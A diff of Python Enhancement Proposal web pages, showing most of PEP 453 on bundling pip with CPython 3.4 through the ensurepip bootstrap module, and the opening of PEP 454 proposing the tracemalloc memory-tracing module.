Currently, on systems without a platform package manager and repository, +installing a third-party Python package into a freshly installed Python +requires first identifying an appropriate package manager and then +installing it.

+

Even on systems that do have a platform package manager, it is unlikely to +include every package that is available on the Python Package Index, and +even when a desired third-party package is available, the correct name in +the platform package manager may not be clear.

+

This means that, to work effectively with the Python Package Index +ecosystem, users must know which package manager to install, where to get +it, and how to install it. The effect of this is that third-party Python +projects are currently required to choose from a variety of undesirable +alternatives:

+
    +
  • Assume the user already has a suitable cross-platform package manager +installed.
  • +
  • Duplicate the instructions and tell their users how to install the +package manager.
  • +
  • Completely forgo the use of dependencies to ease installation concerns +for their users.
  • +
+

All of these available options have significant drawbacks.

+

If a project simply assumes a user already has the tooling then beginning +users may get a confusing error message when the installation command +doesn’t work. Some operating systems may ease this pain by providing a +global hook that looks for commands that don’t exist and suggest an OS +package they can install to make the command work, but that only works +on systems with platform package managers that include a package that +provides the relevant cross-platform installer command (such as many major +Linux distributions). No such assistance is available for Windows and +Mac OS X users, or more conservative Linux distributions. The challenges +of dealing with this problem for beginners (who are often also completely +new to programming, the use of command line tools and editing system +environment variables) are a regular feature of feedback the core Python +developers receive from professional educators and others introducing new +users to Python.

+

If a project chooses to duplicate the installation instructions and tell their users how to install the package manager before telling them how to install their own project, then whenever these instructions need updates they need updating by every project that has duplicated them. This is particularly problematic when there are multiple competing installation tools available, and different projects recommend different tools.

+

This specific problem can be partially alleviated by strongly promoting +pip as the default installer and recommending that other projects +reference pip’s own bootstrapping instructions rather than +duplicating them. However the user experience created by this approach +still isn’t particularly good (although there is an effort under way to +create a combined Windows installer for pip and its dependencies that +should improve matters on that platform, and Mac OS X and *nix platforms +generally have wget and hence the ability to easily download and run the +bootstrap scripts from the command line).

+

The projects that have decided to forgo dependencies altogether are forced +to either duplicate the efforts of other projects by inventing their own +solutions to problems or are required to simply include the other projects +in their own source trees. Both of these options present their own problems +either in duplicating maintenance work across the ecosystem or potentially +leaving users vulnerable to security issues because the included code or +duplicated efforts are not automatically updated when upstream releases a new +version.

+

By officially recommending and providing by default a specific cross-platform +package manager it will be easier for users trying to install these +third-party packages as well as easier for the people distributing them as +they should now be able to safely assume that most users will have the +appropriate installation tools available (or access to clear instructions on +how to obtain them). This is expected to become more important in the future +as the Wheel package format (deliberately) does not have a built in +“installer” in the form of setup.py so users wishing to install +from a wheel file will want an installer even in the simplest cases.

+

Reducing the burden of actually installing a third-party package should +also decrease the pressure to add every useful module to the standard +library. This will allow additions to the standard library to focus more +on why Python should have a particular tool out of the box, and why it +is reasonable for that package to adopt the standard library’s 18-24 month +feature release cycle, instead of using the general difficulty of installing +third-party packages as justification for inclusion.

+

Providing a standard installation system also helps with bootstrapping +alternate build and installer systems, such as zc.buildout, hashdist +and conda. So long as pip install <tool> works, then a standard +Python-specific installer provides a reasonably secure, cross platform +mechanism to get access to these utilities.

+
+
+

Enabling the evolution of the broader Python packaging ecosystem

+

As no new packaging standard can achieve widespread adoption without a transition strategy that covers the versions of Python that are in widespread current use (rather than merely future versions, like most language features), the change proposed in this PEP is considered a necessary step in the evolution of the Python packaging ecosystem.

+

The broader community has embraced the Python Package Index as a mechanism +for distributing and installing Python software, but the different concerns +of language evolution and secure software distribution mean that a faster +feature release cycle that encompasses older versions is needed to properly +support the latter.

+

In addition, the core CPython development team have the luxury of +dropping support for earlier Python versions well before the rest of the +community, as downstream commercial redistributors pick up the task of +providing support for those versions to users that still need it, while +many third party libraries maintain compatibility with those versions as +long as they remain in widespread use.

+

This means that the current setup.py install based model for package +installation poses serious difficulties for the development and adoption +of new packaging standards, as, depending on how a project writes their +setup.py file, the installation command (along with other operations) +may end up invoking the standard library’s distutils package.

+

As an indicator of how this may cause problems for the broader ecosystem, +consider that the feature set of distutils in Python 2.6 was frozen +in June 2008 (with the release of Python 2.6b1), while the feature set of +distutils in Python 2.7 was frozen in April 2010 (with the release of +Python 2.7b1).

+

By contrast, using a separate installer application like pip (which +ensures that even setup.py files that invoke distutils directly +still support the new packaging standards) makes it possible to support +new packaging standards in older versions of Python, just by upgrading +pip (which receives new feature releases roughly every 6 months). The +situation on older versions of Python is further improved by making it +easier for end users to install and upgrade newer build systems like +setuptools or improved PyPI upload utilities like twine.

+

It is not coincidental that this proposed model of using a separate installer +program with more metadata heavy and less active distribution formats matches +that used by most operating systems (including Windows since the introduction +of the installer service and the MSI file format), as well as many other +language specific installers.

+

For Python 2.6, this compatibility issue is largely limited to various +enterprise Linux distributions (and their downstream derivatives). These +distributions often have even slower update cycles than CPython, so they +offer full support for versions of Python that are considered “security +fix only” versions upstream (and sometimes may even be to the point where +the core development team no longer support them at all - you can still get +commercial support for Python 2.3 if you really need it!).

+

In practice, the fact that tools like wget and curl are readily +available on Linux systems, that most users of Python on Linux are +already familiar with the command line, and that most Linux distributions +ship with a default configuration that makes running Python scripts easy, +means that the existing pip bootstrapping instructions for any *nix +system are already quite straightforward. Even if pip isn’t provided by +the system package manager, then using wget or curl to retrieve the +bootstrap script from www.pip-installer.org and then running it is just a +couple of shell commands that can easily be copied and pasted as necessary.

+

Accordingly, for any version of Python on any *nix system, the need to +bootstrap pip in older versions isn’t considered a major barrier to +adoption of new packaging standards, since it’s just one more small +speedbump encountered by users of these long term stable releases. For +*nix systems, this PEP’s formal endorsement of pip as the preferred +default packaging tool is seen as more important than the underlying +technical details involved in making pip available by default, since +it shifts the nature of the conversation between the developers of pip +and downstream repackagers of both pip and CPython.

+

For Python 2.7, on the other hand, the compatibility issue for adopting new +metadata standards is far more widespread, as it affects the python.org +binary installers for Windows and Mac OS X, as well as even relatively +fast moving *nix platforms.

+

Firstly, and unlike Python 2.6, Python 2.7 is still a fully supported +upstream version, and will remain so until the release of Python 2.7.9 +(currently scheduled for May 2015), at which time it is expected to enter +the usual “security fix only” mode. That means there are at least another +19 months where Python 2.7 is a deployment target for Python applications +that enjoys full upstream support. Even after the core development team +switches 2.7 to security release only mode in 2015, Python 2.7 will likely +remain a commercially supported legacy target out beyond 2020.

+

While Python 3 already presents a compelling alternative over Python 2 for +new Python applications and deployments without an existing investment +in Python 2 and without a dependency on specific Python 2 only third party +modules (a set which is getting ever smaller over time), it is going to take +longer to create compelling business cases to update existing Python 2.7 +based infrastructure to Python 3, especially in situations where the culture +of automated testing is weak (or nonexistent), making it difficult to +effectively use the available migration utilities.

+

While this PEP only proposes documentation changes for Python 2.7, once +pip has a Windows installer available, a separate PEP will be created +and submitted proposing the creation and distribution of aggregate installers +for future CPython 2.7 maintenance releases that combine the CPython, +pip and Python Launcher for Windows installers into a single download +(the separate downloads would still remain available - the aggregate +installers would be provided as a convenience, and as a clear indication +of the recommended operating environment for Python in Windows systems).

+
+
+

Why pip?

+

pip has been chosen as the preferred default installer, as it is an +already popular tool that addresses several design and user experience +issues with its predecessor easy_install (these issues can’t readily +be fixed in easy_install itself due to backwards compatibility +concerns). pip is also well suited to working within the bounds of +a single Python runtime installation (including associated virtual +environments), which is a desirable feature for a tool bundled with CPython.

+

Other tools like zc.buildout and conda are more ambitious in their +aims (and hence substantially better than pip at handling external +binary dependencies), so it makes sense for the Python ecosystem to treat +them more like platform package managers to interoperate with rather than +as the default cross-platform installation tool. This relationship is +similar to that between pip and platform package management systems +like apt and yum (which are also designed to handle arbitrary +binary dependencies).

+
+
+
+

Proposal Overview

+

This PEP proposes that the +Installing Python Modules guide be +updated to officially recommend the use of pip as the default +installer for Python packages, rather than the current approach of +recommending the direct invocation of the setup.py install command.

+

However, to avoid recommending a tool that CPython does not provide, it is +further proposed that the pip package manager be made available by +default when installing CPython 3.4 or later and when creating virtual +environments using the standard library’s venv module via the +pyvenv command line utility.

+

To support that end, this PEP proposes the inclusion of an ensurepip +bootstrapping module in Python 3.4, as well as automatic invocation of that +module from pyvenv and changes to the way Python installed scripts are +handled on Windows. Using a bootstrap module rather than providing pip +directly helps to clearly demarcate development responsibilities, and to +avoid inadvertently downgrading pip when updating CPython.

+

To provide clear guidance for new users of Python that may not be +starting with the latest release, this PEP also proposes that the +“Installing Python Modules” guides in Python 2.7 and 3.3 be updated to +recommend installing and using pip, rather than invoking distutils +directly. It does not propose backporting any of the code changes that +are being proposed for Python 3.4.

+

Finally, the PEP also strongly recommends that CPython redistributors and +other Python implementations ensure that pip is available by default, or +at the very least, explicitly document the fact that it is not included.

+

This PEP does not propose making pip (or any dependencies) directly +available as part of the standard library. Instead, pip will be a +bundled application provided along with CPython for the convenience +of Python users, but subject to its own development life cycle and able +to be upgraded independently of the core interpreter and standard library.

+
+
+

Explicit bootstrapping mechanism

+

An additional module called ensurepip will be added to the standard +library whose purpose is to install pip and any of its dependencies into the +appropriate location (most commonly site-packages). It will expose a +callable named bootstrap() as well as offer direct execution via +python -m ensurepip.

+

The bootstrap will not contact PyPI, but instead rely on a private copy +of pip stored inside the standard library. Accordingly, only options +related to the installation location will be supported (--user, +--root, etc).

+

It is considered desirable that users be strongly encouraged to use the +latest available version of pip, in order to take advantage of the +ongoing efforts to improve the security of the PyPI based ecosystem, as +well as benefiting from the efforts to improve the speed, reliability and +flexibility of that ecosystem.

+

In order to satisfy this goal of providing the most recent version of +pip by default, the private copy of pip will be updated in CPython +maintenance releases, which should align well with the 6-month cycle used +for new pip releases.

+
+

Security considerations

+

The design in this PEP has been deliberately chosen to avoid making any +significant changes to the trust model of CPython for end users that do +not subsequently run the command pip install --upgrade pip.

+

The installers will contain all the components of a fully functioning +version of Python, including the pip installer. The installation +process will not require network access, and will not rely on +trusting the security of the network connection established between +pip and the Python package index.

+

Only users that choose to use pip to communicate with PyPI will +need to pay attention to the additional security considerations that come +with doing so.

+

However, the core CPython team will still assist with reviewing and +resolving at least the certificate update management issue currently +affecting the requests project (and hence pip), and may also be +able to offer assistance in resolving other identified security concerns +[1].

+
+
+

Reliability considerations

+

By including the bootstrap as part of the standard library (rather than +solely as a feature of the binary installers), the correct operation of +the bootstrap command can be easily tested using the existing CPython +buildbot infrastructure rather than adding significantly to the testing +burden for the installers themselves.

+
+
+

Implementation strategy

+

To ensure there is no need for network access when installing Python or +creating virtual environments, the ensurepip module will, as an +implementation detail, include a complete private copy of pip and its +dependencies which will be used to extract pip and install it into the target +environment. It is important to stress that this private copy of pip is +only an implementation detail and it should not be relied on or +assumed to exist beyond the public capabilities exposed through the +ensurepip module (and indirectly through venv).

+

There is not yet a reference ensurepip implementation. The existing +get-pip.py bootstrap script demonstrates an earlier variation of the +general concept, but the standard library version would take advantage of +the improved distribution capabilities offered by the CPython installers +to include private copies of pip and setuptools as wheel files +(rather than as embedded base64 encoded data), and would not try to +contact PyPI (instead installing directly from the private wheel files).

+

Rather than including separate code to handle the bootstrapping, the +ensurepip module will manipulate sys.path appropriately to allow +the wheel files to be used to install themselves, either into the current +Python installation or into a virtual environment (as determined by the +options passed to the bootstrap command).

+

It is proposed that the implementation be carried out in six separate steps (all steps after the first two are independent of each other and can be carried out in any order):

+
    +
  • the first step would update the “Installing Python Modules” documentation +to recommend the use of pip and reference the pip team’s +instructions for downloading and installing it. This change would be +applied to Python 2.7, 3.3, and 3.4.
  • +
  • the ensurepip module and the private copies of the most recently +released versions of pip and setuptools would be added to Python 3.4 +and the 3.4 “Installing Python Modules” documentation updated accordingly.
  • +
  • the CPython Windows installer would be updated to offer the new pip +installation option for Python 3.4.
  • +
  • the CPython Mac OS X installer would be updated to offer the new pip +installation option for Python 3.4.
  • +
  • the venv module and pyvenv command would be updated to make use of ensurepip in Python 3.4.
  • +
  • the PATH handling on Windows would be updated for Python 3.4+.
  • +
+
+
+

Integration timeline

+

If this PEP is accepted, the proposed time frame for integration of pip +into the CPython release is as follows:

+
    +
  • as soon as possible after the release of 3.4.0 alpha 4
      +
    • Documentation updated and ensurepip implemented based on a +pre-release version of pip 1.5.
    • +
    • All other proposed functional changes for Python 3.4 implemented, +including the installer updates to invoke ensurepip.
    • +
    +
  • +
  • by November 20th (3 days prior to the scheduled date of 3.4.0 beta 1)
      +
    • ensurepip updated to use a pip 1.5 release candidate.
    • +
    • PEP 101 updated to cover ensuring the bundled version of pip is up +to date.
    • +
    +
  • +
  • by November 24th (scheduled date of 3.4.0 beta 1)
      +
    • As with any other new feature, all proposed functional changes for +Python 3.4 must be implemented prior to the beta feature freeze.
    • +
    +
  • +
  • by December 29th (1 week prior to the scheduled date of 3.4.0 beta 2)
      +
    • requests certificate management issue resolved
    • +
    • ensurepip updated to the final release of pip 1.5, or a +subsequent maintenance release (including a suitably updated vendored +copy of requests)
    • +
    +
  • +
+

(See PEP 429 for the current official scheduled dates of each release. Dates +listed above are accurate as of October 20th, 2013.)

+

If there is no final or maintenance release of pip 1.5 with a suitable +updated version of requests available by one week before the scheduled +Python 3.4 beta 2 release, then implementation of this PEP will +be deferred to Python 3.5. Note that this scenario is considered unlikely - +the tentative date for the pip 1.5 release is currently December 1st.

+

In future CPython releases, this kind of coordinated scheduling shouldn’t be +needed: the CPython release manager will be able to just update to the latest +released version of pip. However, in this case, some fixes are needed in +pip in order to allow the bundling to work correctly, and the +certificate update mechanism for requests needs to be improved, so the +pip 1.5 release cycle needs to be properly aligned with the CPython 3.4 +beta releases.

+
+
+

Proposed CLI

+

The proposed CLI is based on a subset of the existing pip install +options:

+
Usage:
+  python -m ensurepip [options]
+
+General Options:
+  -h, --help          Show help.
+  -v, --verbose       Give more output. Option is additive, and can be used up to 3 times.
+  -V, --version       Show the pip version that would be extracted and exit.
+  -q, --quiet         Give less output.
+
+Installation Options:
+  -U, --upgrade       Upgrade pip and dependencies, even if already installed
+  --user              Install using the user scheme.
+  --root <dir>        Install everything relative to this alternate root directory.
+
+
+

In most cases, end users won’t need to use this CLI directly, as pip +should have been installed automatically when installing Python or when +creating a virtual environment. However, it is formally documented as a +public interface to support at least these known use cases:

+
    +
  • Windows and Mac OS X installations where the “Install pip” option was +not chosen during installation
  • +
  • any installation where the user previously ran “pip uninstall pip”
  • +
+

Users that want to retrieve the latest version from PyPI, or otherwise +need more flexibility, can then invoke the extracted pip appropriately.

+
+
+

Proposed module API

+

The proposed ensurepip module API consists of the following two +functions:

+
def version():
+    """
+    Returns a string specifying the bundled version of pip.
+    """
+
+def bootstrap(root=None, upgrade=False, user=False, verbosity=0):
+    """
+    Bootstrap pip into the current Python installation (or the given root
+    directory).
+    """
+
+
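A sketch of how the proposed API would be used programmatically (mirroring the CLI shown earlier):

import ensurepip

print(ensurepip.version())         # version of the private copy of pip
ensurepip.bootstrap(upgrade=True)  # like: python -m ensurepip --upgrade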
+
+
+

Invocation from the CPython installers

+

The CPython Windows and Mac OS X installers will each gain a new option:

+
    +
  • Install pip (the default Python package management utility)?
  • +
+

This option will be checked by default.

+

If the option is checked, then the installer will invoke the following +command with the just installed Python:

+
python -m ensurepip --upgrade
+
+
+

This ensures that, by default, installing or updating CPython will ensure +that the installed version of pip is at least as recent as the one included +with that version of CPython. If a newer version of pip has already been +installed then python -m ensurepip --upgrade will simply return without +doing anything.

+
+
+

Installing from source

+

Just as the prebuilt binary installers will be updated to run +python -m ensurepip by default, a similar change will be made to the +make install and make altinstall commands of the source +distribution. The directory settings in the sysconfig module should +ensure the pip components are automatically installed to the expected +locations.

+

ensurepip itself (including the private copy of pip and its +dependencies) will always be installed normally (as it is a regular +part of the standard library), but an option will be provided to skip +the invocation of ensurepip.

+

This means that even installing from source will provide pip by default, but redistributors that provide pip by other means (or choose not to provide it at all) will still be able to opt out of installing it using ensurepip.

+
+
+

Changes to virtual environments

+

Python 3.3 included a standard library approach to virtual Python environments +through the venv module. Since its release it has become clear that very +few users have been willing to use this feature directly, in part due to the +lack of an installer present by default inside of the virtual environment. +They have instead opted to continue using the virtualenv package which +does include pip installed by default.

+

To make the venv more useful to users it will be modified to issue the +pip bootstrap by default inside of the new environment while creating it. This +will allow people the same convenience inside of the virtual environment as +this PEP provides outside of it as well as bringing the venv module closer +to feature parity with the external virtualenv package, making it a more +suitable replacement.

+

To handle cases where a user does not wish to have pip bootstrapped into +their virtual environment a --without-pip option will be +added.

+

The venv.EnvBuilder and venv.create APIs will be updated to accept +one new parameter: with_pip (defaulting to False).

+

The new default for the module API is chosen for backwards compatibility with the current behaviour (as it is assumed that most invocations of the venv module happen through third-party tools that likely will not want pip installed without explicitly requesting it), while the default for the command line interface is chosen to try to ensure pip is available in most virtual environments without additional action on the part of the end user.
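A sketch of the resulting module API and CLI behaviour (the paths are illustrative):

import venv

# Module API: pip is only bootstrapped when explicitly requested.
venv.create("/tmp/env-with-pip", with_pip=True)

# CLI: pip is bootstrapped by default; opt out with --without-pip.
#   pyvenv /tmp/env-default          (includes pip)
#   pyvenv --without-pip /tmp/bare   (no pip)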

+

As this change will only benefit Python 3.4 and later versions, the +third-party virtualenv project will still be needed to obtain a +consistent cross-version experience in Python 3.3 and 2.7.

+
+
+

Documentation

+

The “Installing Python Modules” section of the standard library +documentation in Python 2.7, 3.3 and 3.4 will be updated to recommend +the use of the pip installer, either provided by default in Python 3.4 +or retrieved and installed by the user in Python 2.7 or 3.3. It will give +a brief description of the most common commands and options, but delegate +to the externally maintained pip documentation for the full details.

+

In Python 3.4, the pyvenv and venv documentation will also be +updated to reference the revised module installation guide.

+

The existing content of the module installation guide will be retained in +all versions, but under a new “Invoking distutils directly” subsection.

+
+
+

Bundling CA certificates with CPython

+

The ensurepip implementation will include the pip CA bundle along +with the rest of pip. This means CPython effectively includes +a CA bundle that is used solely by pip after it has been extracted.

+

This is considered preferable to relying solely on the system +certificate stores, as it ensures that pip will behave the same +across all supported versions of Python, even those prior to Python 3.4 +that cannot access the system certificate store on Windows.

+
+
+

Automatic installation of setuptools

+

pip currently depends on setuptools to handle metadata generation +during the build process, along with some other features. While work is +ongoing to reduce or eliminate this dependency, it is not clear if that +work will be complete for pip 1.5 (which is the version likely to be current +when Python 3.4.0 is released).

+

This PEP proposes that, if pip still requires it as a dependency, ensurepip will include a private copy of setuptools (in addition to the private copy of pip). python -m ensurepip will then install the private copy in addition to installing pip itself.

+

However, this behavior is officially considered an implementation +detail. Other projects which explicitly require setuptools must still +provide an appropriate dependency declaration, rather than assuming +setuptools will always be installed alongside pip.

+

The private copy of setuptools will be removed from ensurepip +once it is no longer needed. This is likely to be at the point when +get-pip.py stops installing setuptools by default. +As long as setuptools is needed, it will be a completely unmodified copy of +the latest upstream setuptools release, including the easy_install +script if the upstream setuptools continues to include it. The installation +of easy_install along with pip isn’t considered desirable, but +installing a broken setuptools would be worse. This problem will +naturally resolve itself once the pip developers have managed to +eliminate their dependency on setuptools and the private copy of +setuptools can be removed entirely from CPython.

+
+
+

Updating the private copy of pip

+

In order to keep up with evolutions in packaging, as well as providing users with as recent a version as possible, the ensurepip module will be regularly updated to the latest versions of everything it bootstraps.

+

After each new pip release, and again during the preparation for any +release of Python (including feature releases), a script, provided as part +of the implementation for this PEP, will be run to ensure the private +copies stored in the CPython source repository have been updated to the +latest versions.

+
+
+

Updating the ensurepip module API and CLI

+

Like venv and pyvenv, the ensurepip module API and CLI +will be governed by the normal rules for the standard library: no +new features are permitted in maintenance releases.

+

However, the embedded components may be updated as noted above, so +the extracted pip may offer additional functionality in maintenance +releases.

+
+
+
+

Uninstallation

+

No changes are proposed to the CPython uninstallation process by this PEP. The bootstrapped pip will be installed the same way as any other pip-installed package, and will be handled in the same way as any other post-install additions to the Python environment.

+

At least on Windows, that means the bootstrapped files will be +left behind after uninstallation, since those files won’t be associated +with the Python MSI installer.

+

While the case can be made for the CPython installers clearing out these +directories automatically, changing that behaviour is considered outside +the scope of this PEP.

+
+
+

Script Execution on Windows

+

While the Windows installer was updated in Python 3.3 to optionally +make python available on the PATH, no such change was made to +include the script installation directory returned by +sysconfig.get_path("scripts").

+

Accordingly, in addition to adding the option to extract and install pip during installation, this PEP proposes that the Windows installer in Python 3.4 and later be updated to also add the path returned by sysconfig.get_path("scripts") to the Windows PATH when the PATH modification option is enabled during installation.

+

Note that this change will only be available in Python 3.4 and later.

+

This means that, for Python 3.3, the most reliable way to invoke pip globally +on Windows (without tinkering manually with PATH) will still remain +py -m pip (or py -3 -m pip to select the Python 3 version if both +Python 2 and 3 are installed) rather than simply calling pip. This +works because Python 3.3 provides the Python Launcher for +Windows (and the associated py command) by default.

+

For Python 2.7 and 3.2, the most reliable mechanism will be to install the +Python Launcher for Windows using the standalone installer and then use +py -m pip as noted above.

+

Adding the scripts directory to the system PATH will mean that pip +works reliably in the “only one Python installation on the system PATH” +case, with py -m pip, pipX, or pipX.Y needed only to select a +non-default version in the parallel installation case (and outside a virtual +environment). This change should also make the pyvenv command substantially +easier to invoke on Windows, along with all scripts installed by pip, +easy_install and similar tools.

+

While the script invocations on recent versions of Python will run through +the Python launcher for Windows, this shouldn’t cause any issues, as long +as the Python files in the Scripts directory correctly specify a Python version +in their shebang line or have an adjacent Windows executable (as +easy_install and pip do).

+
+
+

Recommendations for Downstream Distributors

+

A common source of Python installations is downstream distributors such as the various Linux distributions [3] [4] [5], OSX package managers [6] [7] [8], and commercial Python redistributors [9] [10] [11]. In order to provide a consistent, user-friendly experience to all users of Python, regardless of how they obtained Python, this PEP recommends and asks that downstream distributors:

+
    +
  • Ensure that whenever Python is installed pip is either installed or is +otherwise made readily available to end users.
      +
    • For redistributors using binary installers, this may take the form of +optionally executing the ensurepip bootstrap during installation, +similar to the CPython installers.
    • +
    • For redistributors using package management systems, it may take the +form of separate packages with dependencies on each other so that +installing the Python package installs the pip package and installing +the pip package installs the Python package.
    • +
    • Another reasonable way to implement this is to package pip separately but +ensure that there is some sort of global hook that will recommend +installing the separate pip package when a user executes pip without +it being installed. Systems that choose this option should ensure that +the ensurepip module still installs pip directly when invoked inside +a virtual environment, but may modify the module in the system Python +installation to redirect to the platform provided mechanism when +installing pip globally.
    • +
    +
  • +
  • Even if pip is made available globally by other means, do not remove the +ensurepip module in Python 3.4 or later.
      +
    • ensurepip will be required for automatic installation of pip into +virtual environments by the venv module.
    • +
    • This is similar to the existing virtualenv package for which many +downstream distributors have already made exception to the common +“debundling” policy.
    • +
    • This does mean that if pip needs to be updated due to a security issue, so does the private copy in the ensurepip bootstrap module.
    • +
    • However, altering the private copy of pip to remove the embedded +CA certificate bundle and rely on the system CA bundle instead is a +reasonable change.
    • +
    +
  • +
  • Ensure that all features of this PEP continue to work with any modifications +made to the redistributed version of Python.
      +
    • Checking the version of pip that will be bootstrapped using +python -m ensurepip --version or ensurepip.version().
    • +
    • Installation of pip into a global or virtual python environment using +python -m ensurepip or ensurepip.bootstrap().
    • +
    • pip install --upgrade pip in a global installation should not affect +any already created virtual environments (but is permitted to affect +future virtual environments, even though it will not do so when using +the standard implementation of ensurepip).
    • +
    • pip install --upgrade pip in a virtual environment should not affect +the global installation.
    • +
    +
  • +
  • Migrate build systems to utilize pip and Wheel +wherever feasible +and avoid directly invoking setup.py.
      +
    • This will help ensure a smoother and more timely migration to improved +metadata formats as the Python packaging ecosystem continues to evolve.
    • +
    +
  • +
+
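The checks referred to above could look like this in practice (a minimal sketch using only the public ensurepip API):

import ensurepip

# Report the version of pip that would be bootstrapped,
# equivalent to "python -m ensurepip --version".
print(ensurepip.version())

# Install the bundled pip into the current environment
# (global or virtual), equivalent to "python -m ensurepip".
ensurepip.bootstrap()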

In the event that a Python redistributor chooses not to follow these +recommendations, we request that they explicitly document this fact and +provide their users with suitable guidance on translating upstream pip +based installation instructions into something appropriate for the platform.

+

Other Python implementations are also encouraged to follow these guidelines +where applicable.

+
+
+

Policies & Governance

+

The maintainers of the bootstrapped software and the CPython core team will +work together in order to address the needs of both. The bootstrapped +software will still remain external to CPython and this PEP does not +include CPython subsuming the development responsibilities or design +decisions of the bootstrapped software. This PEP aims to decrease the +burden on end users wanting to use third-party packages and the +decisions inside it are pragmatic ones that represent the trust that the +Python community has already placed in the Python Packaging Authority as +the authors and maintainers of pip, setuptools, PyPI, virtualenv +and other related projects.

+
+

Backwards Compatibility

+

The public API and CLI of the ensurepip module itself will fall under +the typical backwards compatibility policy of Python for its standard +library. The externally developed software that this PEP bundles does not.

+

Most importantly, this means that the bootstrapped version of pip may gain +new features in CPython maintenance releases, and pip continues to operate on +its own 6 month release cycle rather than CPython’s 18-24 month cycle.

+
+
+

Security Releases

+

Any security update that affects the ensurepip module will be shared +prior to release with the Python Security Response Team +(security@python.org). The PSRT will then decide if the reported issue +warrants a security release of CPython with an updated private copy of +pip.

+
+
+

Licensing

+

pip is currently licensed as 1 Clause BSD, and it contains code taken +from other projects. Additionally this PEP will include setuptools until +such time as pip no longer requires it. The licenses for these appear in +the table below.

Project             License
==================  ============
requests            Apache 2.0
six                 1 Clause BSD
html5lib            1 Clause BSD
distlib             PSF
colorama            3 Clause BSD
Mozilla CA Bundle   LGPL
setuptools          PSF

All of these licenses should be compatible with the PSF license. Additionally +it is unclear if a CA Bundle is copyrightable material and thus if it needs +or can be licensed at all.

+
+
+
+

Appendix: Rejected Proposals

+
+

Changing the name of the scripts directory on Windows

+

Earlier versions of this PEP proposed changing the name of the script +installation directory on Windows from “Scripts” to “bin” in order to +improve the cross-platform consistency of the virtual environments created +by pyvenv.

+

However, Paul Moore determined that this change was likely backwards +incompatible with cross-version Windows installers created with previous +versions of Python, so the change has been removed from this PEP +[2].

+
+
+

Including ensurepip in Python 2.7 and 3.3

+

Earlier versions of this PEP made the case that the challenges of getting +pip bootstrapped for new users posed a significant enough barrier to +Python’s future growth that it justified adding ensurepip as a new +feature in the upcoming Python 2.7 and 3.3 maintenance releases.

+

While the proposal to provide pip with Python 3.4 was universally +popular, this part of the proposal was highly controversial and ultimately +rejected by MvL as BDFL-Delegate.

+

Accordingly, the proposal to backport ensurepip to Python 2.7 and 3.3 +has been removed from this PEP in favour of creating a Windows installer +for pip and a possible future PEP suggesting creation of an aggregate +installer for Python 2.7 that combines CPython 2.7, pip and the Python +Launcher for Windows.

+
+
+

Automatically contacting PyPI when bootstrapping pip

+

Earlier versions of this PEP called the bootstrapping module getpip and +defaulted to downloading and installing pip from PyPI, with the private +copy used only as a fallback option or when explicitly requested.

+

This resulted in several complex edge cases, along with difficulties in +defining a clean API and CLI for the bootstrap module. It also significantly +altered the default trust model for the binary installers published on +python.org, as end users would need to explicitly opt-out of trusting +the security of the PyPI ecosystem (rather than opting in to it by +explicitly invoking pip following installation).

+

As a result, the PEP was simplified to the current design, where the +bootstrapping always uses the private copy of pip. Contacting PyPI +is now always an explicit separate step, with direct access to the full +pip interface.

+

Removing the implicit attempt to access PyPI also made it feasible to +invoke ensurepip by default when installing from a custom source build.

+
+
+

Implicit bootstrap

+

PEP 439, the predecessor of this PEP, proposed its own solution: shipping a fake pip command that, when executed, would implicitly bootstrap and install pip if it did not already exist. This has been rejected because it is too “magical”. It hides from the end user when exactly the pip command will be installed, or that it is being installed at all. It also does not provide any recommendations or considerations for downstream packagers who wish to manage the globally installed pip through the mechanisms typical for their system.

+

The implicit bootstrap mechanism also ran into possible permissions issues, +if a user inadvertently attempted to bootstrap pip without write access to +the appropriate installation directories.

+
+
+

Including pip directly in the standard library

+

Similar to this PEP is the proposal of just including pip in the standard library. This would ensure that Python always includes pip, and it fixes all of the end-user-facing problems with not having pip present by default. This has been rejected because we’ve learned, through the inclusion and history of distutils in the standard library, that losing the ability to update the packaging tools independently can leave the tooling in a state of constant limbo, unable to evolve in a time frame that actually affects users, as any new features will not be available to the general population for years.

+

Allowing the packaging tools to progress separately from the Python release +and adoption schedules allows the improvements to be used by all members +of the Python community and not just those able to live on the bleeding edge +of Python releases.

+

There have also been issues in the past with the “dual maintenance” problem if a project continues to be maintained externally while also having a fork maintained in the standard library. Since external maintenance of pip will always be needed to support earlier Python versions, the proposed bootstrapping mechanism will become the explicit responsibility of the CPython core developers (assisted by the pip developers), while pip issues reported to the CPython tracker will be migrated to the pip issue tracker. There will no doubt still be some user confusion over which tracker to use, but hopefully less than has been seen historically when including complete public copies of third-party projects in the standard library.

+

The approach described in this PEP also avoids some technical issues +related to handling CPython maintenance updates when pip has been +independently updated to a more recent version. The proposed pip-based +bootstrapping mechanism handles that automatically, since pip and the +system installer never get into a fight about who owns the pip +installation (it is always managed through pip, either directly, or +indirectly via the ensurepip bootstrap module).

+

Finally, the separate bootstrapping step means it is also easy to avoid +installing pip at all if end users so desire. This is often the case +if integrators are using system packages to handle installation of +components written in multiple languages using a common set of tools.

+
+
+

Defaulting to --user installation

+

Some consideration was given to bootstrapping pip into the per-user +site-packages directory by default. However, this behavior would be +surprising (as it differs from the default behavior of pip itself) +and is also not currently considered reliable (there are some edge cases +which are not handled correctly when pip is installed into the user +site-packages directory rather than the system site-packages).

+
+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0453.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0454/index.html b/pep-0454/index.html
new file mode 100644
index 00000000000..d97b8d18d8d
--- /dev/null
+++ b/pep-0454/index.html
PEP 454 – Add a new tracemalloc module to trace Python memory allocations | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 454 – Add a new tracemalloc module to trace Python memory allocations

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
BDFL-Delegate:
+
Charles-François Natali <cf.natali at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
03-Sep-2013
+
Python-Version:
+
3.4
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add a new tracemalloc module to trace memory +blocks allocated by Python.

+
+
+

Rationale

+

Classic generic tools like Valgrind can get the C traceback where a +memory block was allocated. Using such tools to analyze Python memory +allocations does not help because most memory blocks are allocated in +the same C function, in PyMem_Malloc() for example. Moreover, Python +has an allocator for small objects called “pymalloc” which keeps free +blocks for efficiency. This is not well handled by these tools.

+

